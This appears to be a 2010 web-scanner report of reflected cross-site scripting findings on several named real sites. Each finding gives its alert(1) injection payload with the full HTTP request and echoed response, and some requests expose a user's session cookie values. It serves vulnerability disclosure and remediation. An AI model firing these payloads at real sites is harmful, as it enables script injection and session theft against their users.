Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.bluelithium.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20fa0"-alert(1)-"f46a6512895 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=ad&ad_size=300x250§ion=844600&20fa0"-alert(1)-"f46a6512895=1 HTTP/1.1 Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://guide.opendns.com/main?url=advancedmags.com&servfail= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:56:14 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Mon, 29 Nov 2010 16:56:14 GMT Pragma: no-cache Content-Length: 4324 Age: 0 Proxy-Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ads.bluelithium.com/imp?20fa0"-alert(1)-"f46a6512895=1&Z=300x250&s=844600&_salt=1802580314";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dd0a1<script>alert(1)</script>7fa8af8449b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Anger_Managementdd0a1<script>alert(1)</script>7fa8af8449b/x22 HTTP/1.1 Host: california.uscity.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Date: Mon, 29 Nov 2010 16:58:10 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 7273
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD><TITLE>403 Forbidden</TITLE> <META content="403 Forbidden" name=description> <META content=TRUE name=MSSmartTagsPreventParsing>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cef15<script>alert(1)</script>d60065b328a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Anger_Management/x22cef15<script>alert(1)</script>d60065b328a HTTP/1.1 Host: california.uscity.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Date: Mon, 29 Nov 2010 16:58:11 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 7273
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD><TITLE>403 Forbidden</TITLE> <META content="403 Forbidden" name=description> <META content=TRUE name=MSSmartTagsPreventParsing>
1.4. http://california.uscity.net/Anger_Management/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://california.uscity.net
Path:
/Anger_Management/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8e3a2<script>alert(1)</script>56ad1e30ea3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Anger_Management/x22?8e3a2<script>alert(1)</script>56ad1e30ea3=1 HTTP/1.1 Host: california.uscity.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Date: Mon, 29 Nov 2010 16:58:10 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 7276
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD><TITLE>403 Forbidden</TITLE> <META content="403 Forbidden" name=description> <META content=TRUE name=MSSmartTagsPreventParsing>
1.5. http://dictionary.babylon.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dictionary.babylon.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 440dc"><img%20src%3da%20onerror%3dalert(1)>04572a4607b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 440dc"><img src=a onerror=alert(1)>04572a4607b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?440dc"><img%20src%3da%20onerror%3dalert(1)>04572a4607b=1 HTTP/1.1 Host: dictionary.babylon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>?440dc"><img src=a ...[SNIP]... <meta name="Description" content="Definition of ?440dc"><img src=a onerror=alert(1)>04572a4607b=1" /> ...[SNIP]...
1.6. http://dictionary.babylon.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dictionary.babylon.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5aa5f<img%20src%3da%20onerror%3dalert(1)>9992f2415fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5aa5f<img src=a onerror=alert(1)>9992f2415fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?5aa5f<img%20src%3da%20onerror%3dalert(1)>9992f2415fe=1 HTTP/1.1 Host: dictionary.babylon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>?5aa5f<img src=a on ...[SNIP]... <li>Definition of ?5aa5f<img src=a onerror=alert(1)>9992f2415fe=1</li> ...[SNIP]...
1.7. http://dictionary.law.com/default2.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dictionary.law.com
Path:
/default2.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5d09"-alert(1)-"87da286f20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default2.asp?b5d09"-alert(1)-"87da286f20=1 HTTP/1.1 Host: dictionary.law.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Mon, 29 Nov 2010 16:58:30 GMT X-Powered-By: ASP.NET Connection: close X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 19264
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="docHead"><meta ...[SNIP]... media.hitbox.com";
The value of the submit1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44976"-alert(1)-"39fe846e8ad was submitted in the submit1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default2.asp?typed=ASSET&type=1&submit1.x=62&submit1.y=13&submit1=Look+up44976"-alert(1)-"39fe846e8ad HTTP/1.1 Host: dictionary.law.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Mon, 29 Nov 2010 16:58:57 GMT X-Powered-By: ASP.NET Connection: close X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 19740
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="docHead"><meta ...[SNIP]... ION VARIABLES hbx.acct="DM541231C3NS64EN3";//ACCOUNT NUMBER(S)
The value of the submit1.x request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2ed2"-alert(1)-"1aceecaa9e2 was submitted in the submit1.x parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default2.asp?typed=ASSET&type=1&submit1.x=62b2ed2"-alert(1)-"1aceecaa9e2&submit1.y=13&submit1=Look+up HTTP/1.1 Host: dictionary.law.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Mon, 29 Nov 2010 16:58:46 GMT X-Powered-By: ASP.NET Connection: close X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 19740
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="docHead"><meta ...[SNIP]... DITABLE SECTION //CONFIGURATION VARIABLES hbx.acct="DM541231C3NS64EN3";//ACCOUNT NUMBER(S)
The value of the submit1.y request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4767"-alert(1)-"7aa955ca2a6 was submitted in the submit1.y parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default2.asp?typed=ASSET&type=1&submit1.x=62&submit1.y=13b4767"-alert(1)-"7aa955ca2a6&submit1=Look+up HTTP/1.1 Host: dictionary.law.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Mon, 29 Nov 2010 16:58:51 GMT X-Powered-By: ASP.NET Connection: close X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 19740
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="docHead"><meta ...[SNIP]... ON //CONFIGURATION VARIABLES hbx.acct="DM541231C3NS64EN3";//ACCOUNT NUMBER(S)
The value of the typed request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 189a5"-alert(1)-"7c7e3621436 was submitted in the typed parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default2.asp?typed=ASSET189a5"-alert(1)-"7c7e3621436&type=1&submit1.x=62&submit1.y=13&submit1=Look+up HTTP/1.1 Host: dictionary.law.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Mon, 29 Nov 2010 16:58:35 GMT X-Powered-By: ASP.NET Connection: close X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 18615
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="docHead"><meta ...[SNIP]... x.com";
hbx.pndef="title";//DEFAULT PAGE NAME //hbx.pndef="filename";//DEFAULT PAGE NAME
//hbx.ctdef="full";//DEFAULT ...[SNIP]...
1.12. http://dictionary.lp.findlaw.com/scripts/search.pl [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dictionary.lp.findlaw.com
Path:
/scripts/search.pl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 16125<script>alert(1)</script>005c3488dd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /scripts/search.pl?16125<script>alert(1)</script>005c3488dd3=1 HTTP/1.1 Host: dictionary.lp.findlaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:58:31 GMT Server: Apache/1.3.29 (Unix) mod_jk/1.1.0 mod_perl/1.29 Set-Cookie: FindLawTP=TOMPA-Primary-174.122.23.218-23327-1291049911-697973-1817-APMOT; domain=.findlaw.com; path=/; expires=Tue, 29-Nov-11 16:58:31 GMT Cache-Control: max-age=86400, max-age=86400 Expires: Tue, 30 Nov 2010 16:58:31 GMT Connection: close Content-Type: text/html Content-Length: 13349
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html;charset ...[SNIP]... <B>16125<script>alert(1)</script>005c3488dd3=1</b> ...[SNIP]...
1.13. http://dictionary.lp.findlaw.com/scripts/search.pl [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dictionary.lp.findlaw.com
Path:
/scripts/search.pl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb66f"><script>alert(1)</script>c023226bea0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /scripts/search.pl?cb66f"><script>alert(1)</script>c023226bea0=1 HTTP/1.1 Host: dictionary.lp.findlaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:58:30 GMT Server: Apache/1.3.29 (Unix) mod_jk/1.1.0 mod_perl/1.29 Set-Cookie: FindLawTP=TOMPA-Primary-174.122.23.218-31762-1291049910-990620-1671-APMOT; domain=.findlaw.com; path=/; expires=Tue, 29-Nov-11 16:58:30 GMT Cache-Control: max-age=86400, max-age=86400 Expires: Tue, 30 Nov 2010 16:58:30 GMT Connection: close Content-Type: text/html Content-Length: 13355
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html;charset ...[SNIP]... <a href="http://login.findlaw.com/scripts/register?dest=/scripts/search.pl?cb66f"><script>alert(1)</script>c023226bea0=1"> ...[SNIP]...
The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 931e9"><script>alert(1)</script>ad0cf17018 was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /scripts/search.pl?s=asset931e9"><script>alert(1)</script>ad0cf17018 HTTP/1.1 Host: dictionary.lp.findlaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:58:31 GMT Server: Apache/1.3.29 (Unix) mod_jk/1.1.0 mod_perl/1.29 Set-Cookie: FindLawTP=TOMPA-Primary-174.122.23.218-31802-1291049911-813966-1723-APMOT; domain=.findlaw.com; path=/; expires=Tue, 29-Nov-11 16:58:31 GMT Cache-Control: max-age=86400, max-age=86400 Expires: Tue, 30 Nov 2010 16:58:31 GMT Connection: close Content-Type: text/html Content-Length: 13365
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html;charset ...[SNIP]... <a href="http://login.findlaw.com/scripts/register?dest=/scripts/search.pl?s=asset931e9"><script>alert(1)</script>ad0cf17018"> ...[SNIP]...
The value of the s request parameter is copied into the HTML document as plain text between tags. The payload 66e0b<script>alert(1)</script>442084ce5d7 was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /scripts/search.pl?s=asset66e0b<script>alert(1)</script>442084ce5d7 HTTP/1.1 Host: dictionary.lp.findlaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:58:33 GMT Server: Apache/1.3.29 (Unix) mod_jk/1.1.0 mod_perl/1.29 Set-Cookie: FindLawTP=TOMPA-Primary-174.122.23.218-23290-1291049913-40615-1752-APMOT; domain=.findlaw.com; path=/; expires=Tue, 29-Nov-11 16:58:33 GMT Cache-Control: max-age=86400, max-age=86400 Expires: Tue, 30 Nov 2010 16:58:33 GMT Connection: close Content-Type: text/html Content-Length: 13362
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html;charset ...[SNIP]... <B>asset66e0b<script>alert(1)</script>442084ce5d7</b> ...[SNIP]...
1.16. http://guide.opendns.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guide.opendns.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54163"><script>alert(1)</script>3430e8b065a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54163\"><script>alert(1)</script>3430e8b065a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?url=advancedmags%2Ecom&servfail&54163"><script>alert(1)</script>3430e8b065a=1 HTTP/1.1 Host: guide.opendns.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|7EROHGOKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s7YH77Too|8s7YH77Too|8s7YH77Too|s|8s7YH77Too|8s7YH77Too
1.17. http://guide.opendns.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guide.opendns.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14981"><script>alert(1)</script>3ec9547041e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14981\"><script>alert(1)</script>3ec9547041e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?url=advancedmags%2Ecom&servfail&14981"><script>alert(1)</script>3ec9547041e=1 HTTP/1.1 Host: guide.opendns.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|7EROHGOKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s7YH77Too|8s7YH77Too|8s7YH77Too|s|8s7YH77Too|8s7YH77Too
The value of the servfail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef3c5"><script>alert(1)</script>1117a6984ef was submitted in the servfail parameter. This input was echoed as ef3c5\"><script>alert(1)</script>1117a6984ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?url=advancedmags%2Ecom&servfailef3c5"><script>alert(1)</script>1117a6984ef HTTP/1.1 Host: guide.opendns.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; 